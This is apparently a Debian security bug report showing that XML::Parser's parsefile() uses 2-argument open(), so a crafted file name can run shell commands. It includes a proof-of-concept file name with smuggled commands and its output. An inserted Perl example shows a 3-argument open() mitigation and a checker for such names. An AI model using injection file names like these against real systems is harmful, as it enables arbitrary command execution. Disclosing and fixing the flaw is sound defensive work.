Package: libxml-parser-perl
Version: 2.44-2+b4
Tags: security
Control: affects -1 check-all-the-things duck
The XML::Parser::parsefile function uses 2-argument open().
As a consequence, users of this function can't use it to securely check
files with untrusted names. (Unless the users sanitize the filenames
themselves, which they don't, because AFAICT this behavior is not
documented.)
Proof of concept:
$ touch '; false .appdata; cowsay pwned >&2; kill $PPID |'
$ duck
sh: 1: ./: Permission denied
 _______
< pwned >
 -------
        \   ^__^
         \  (oo)\_______
            (__)\       )\/\
                ||----w |
                ||     ||
Terminated
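As an added example (not part of the bug report and not XML::Parser's own code), the following Perl shows the mitigation a caller can apply today: open the file with 3-argument open() and pass the filehandle to parse() instead of calling parsefile(), plus a small check for names that 2-argument open() would not read as a plain filename. The filename and XML content are constructed for the demo.

```perl
#!/usr/bin/perl
# Added example, not from the bug report or from XML::Parser itself.
use strict;
use warnings;
use XML::Parser;

# Names that 2-argument open() does not treat as a plain file name:
# leading/trailing whitespace is stripped, a leading '<', '>', '+' or '|'
# and a trailing '|' select a mode or a pipe, and '-' alone means STDIN.
sub twoarg_open_misparses {
    my ($name) = @_;
    return 1 if $name =~ /^\s|\s$/;
    return 1 if $name =~ /^[<>+|]/;
    return 1 if $name =~ /\|$/;
    return 1 if $name eq '-';
    return 0;
}

# Hardened replacement for $parser->parsefile($path): open the file with
# 3-argument open(), whose mode is fixed to '<', so the name is taken
# literally, then hand the filehandle to parse().
sub parse_untrusted_file {
    my ($parser, $path) = @_;
    open(my $fh, '<', $path) or die "cannot open '$path': $!";
    my $result = $parser->parse($fh);
    close $fh;
    return $result;
}

# Constructed demo: create an XML file whose name would be read as a
# pipeline by 2-argument open() (compare the reporter's 'touch' line).
my $weird = '; echo should-not-run | ';
open(my $out, '>', $weird) or die "cannot create '$weird': $!";
print $out "<root><item>ok</item></root>\n";
close $out;

printf "2-arg open() would misparse '%s': %s\n", $weird,
    twoarg_open_misparses($weird) ? 'yes' : 'no';   # yes

my $parser = XML::Parser->new(Style => 'Tree');
my $tree = parse_untrusted_file($parser, $weird);
print "root element: $tree->[0]\n";                 # root
unlink $weird;
```

Under 3-argument open() the name is a file and nothing is executed; the check function is useful for auditing any remaining 2-argument open() call sites that receive external names.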
-- System Information:
Architecture: i386
Versions of packages libxml-parser-perl depends on:
ii perl 5.28.1-4
ii libc6 2.28-7
ii libexpat1 2.2.6-1
ii liburi-perl 1.76-1
ii libwww-perl 6.36-1
--
Jakub Wilk